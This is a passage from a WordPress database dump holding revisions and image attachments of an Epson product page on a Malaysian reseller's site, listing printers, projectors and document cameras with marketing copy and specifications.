angles and installations</li></ul><h3>DOCUMENT CAMERAS</h3><ol><li>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></li></ol><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>To discover more, please click the button below or contact us to discuss your needs.</p><p>[maxbutton id=\"1\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 12:33:58','2018-12-24 04:33:58','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2443,1,'2018-12-18 20:45:28','2018-12-18 12:45:28','','Â Epson EB-Z10000U','','inherit','closed','closed','','epson-eb-z10000u','','','2018-12-18 20:45:28','2018-12-18 12:45:28','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png',0,'attachment','image/png',0),(2444,1,'2018-12-18 20:47:02','2018-12-18 12:47:02','','Document Camera ELPDC21','','inherit','closed','closed','','document-camera-elpdc21','','','2018-12-18 20:47:02','2018-12-18 12:47:02','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg',0,'attachment','image/jpeg',0),(2442,1,'2018-12-18 20:39:49','2018-12-18 12:39:49','','Epson EB-G7400UNL','','inherit','closed','closed','','epson-eb-g7400unl','','','2018-12-18 20:39:49','2018-12-18 12:39:49','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png',0,'attachment','image/png',0),(2437,1,'2018-12-18 20:26:29','2018-12-18 12:26:29','','Epson LightScene EV-105','','inherit','closed','closed','','epson-lightscene-ev-105','','','2018-12-18 20:26:29','2018-12-18 12:26:29','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg',0,'attachment','image/jpeg',0),(2438,1,'2018-12-18 20:27:13','2018-12-18 12:27:13','','Epson EB-1785W','','inherit','closed','closed','','epson-eb-1785w','','','2018-12-18 20:27:13','2018-12-18 12:27:13','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png',0,'attachment','image/png',0),(2433,1,'2018-12-18 20:20:55','2018-12-18 12:20:55','','Epson L805 PrinterÂ ','','inherit','closed','closed','','epson-l805-printer','','','2018-12-18 20:20:55','2018-12-18 12:20:55','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png',0,'attachment','image/png',0),(2436,1,'2018-12-18 20:23:37','2018-12-18 12:23:37','','Epson EB-L500W','','inherit','closed','closed','','epson-eb-l500w','','','2018-12-18 20:23:37','2018-12-18 12:23:37','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg',0,'attachment','image/jpeg',0),(2431,1,'2018-12-18 20:19:22','2018-12-18 12:19:22','','Epson L1800 Printer','','inherit','closed','closed','','epson-l1800-printer','','','2018-12-18 20:19:22','2018-12-18 12:19:22','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png',0,'attachment','image/png',0),(2429,1,'2018-12-18 20:17:54','2018-12-18 12:17:54','','Epson TM-T88V-i','','inherit','closed','closed','','epson-tm-t88v-i','','','2018-12-18 20:17:54','2018-12-18 12:17:54','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png',0,'attachment','image/png',0),(2423,1,'2018-12-18 20:07:40','2018-12-18 12:07:40','','Epson M1100 PrinterÂ ','','inherit','closed','closed','','epson-m1100-printer','','','2018-12-18 20:07:40','2018-12-18 12:07:40','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png',0,'attachment','image/png',0),(2421,1,'2018-12-18 20:06:27','2018-12-18 12:06:27','','Epson EcoTank L3150Â ','','inherit','closed','closed','','epson-ecotank-l3150','','','2018-12-18 20:06:27','2018-12-18 12:06:27','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg',0,'attachment','image/jpeg',0),(2422,1,'2018-12-18 20:07:02','2018-12-18 12:07:02','','Epson L120 Printer','','inherit','closed','closed','','epson-l120-printer','','','2018-12-18 20:07:02','2018-12-18 12:07:02','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png',0,'attachment','image/png',0),(2420,1,'2018-12-18 20:05:37','2018-12-18 12:05:37','','Epson WorkForce WF-7711','','inherit','closed','closed','','epson-workforce-wf-7711','','','2018-12-18 20:05:37','2018-12-18 12:05:37','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png',0,'attachment','image/png',0),(2750,1,'2018-12-24 12:49:42','2018-12-24 04:49:42','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p>Epson WorkForce Enterprise WF-C17590Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>Epson WorkForce Pro WF-C5290Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>Epson WorkForce WF-100Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>Epson WorkForce WF-7711Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>		\n			<h3>INK TANK SYSTEM</h3>		\n		<p>Epson EcoTank L3150Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><p>Epson L120 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul><p>Epson M1100 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n			<h3>LASER PRINTER</h3>		\n		<p>Epson AcuLaser C9300NÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul><p>Â Epson WorkForce AL-M320DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul><p>Epson WorkForce AL-M8100DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>		\n			<h3>POS PRINTER</h3>		\n		<p>Epson TM-H6000IVÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><p>Epson TM-T88V-iÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul><p>Epson TM-T70IIÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>		\n			<h3>PHOTO PRINTER</h3>		\n		<p>Epson L1800 A3 Photo Ink Tank Printer</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul><p>Epson L850 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><p>Â </p><p>Epson L805 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p>Epson EB-2055<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><p>Epson EB-2142WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul><p>Epson EB-L500WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p>Epson LightScene EV-105</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><h3>ULTRA PORTABLE</h3><p>Epson EB-1785WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>		\n			<h3>INTERACTIVE</h3>		\n		<p>Epson EB-536WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><p>Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul><p>Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul><p>Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul><h3>DOCUMENT CAMERAS</h3><p>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>To discover more, please click the button below or contact us to discuss your needs.</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 12:49:42','2018-12-24 04:49:42','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2746,1,'2018-12-24 12:31:33','2018-12-24 04:31:33','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<ol><li>Epson WorkForce Enterprise WF-C17590Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></li></ol><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>2.Â Epson WorkForce Pro WF-C5290Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>3.Â Epson WorkForce WF-100Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>4.Â Epson WorkForce WF-7711Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>		\n			<h3>INK TANK SYSTEM</h3>		\n		<ol><li>Epson EcoTank L3150Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></li></ol><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><p>2.Â Epson L120 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul><p>3.Â Epson M1100 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul><ol><li>Epson AcuLaser C9300NÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></li></ol><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul><p>Â Epson WorkForce AL-M320DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul><p>Epson WorkForce AL-M8100DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>		\n			<h3>POS PRINTER</h3>		\n		<p>Epson TM-H6000IVÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ 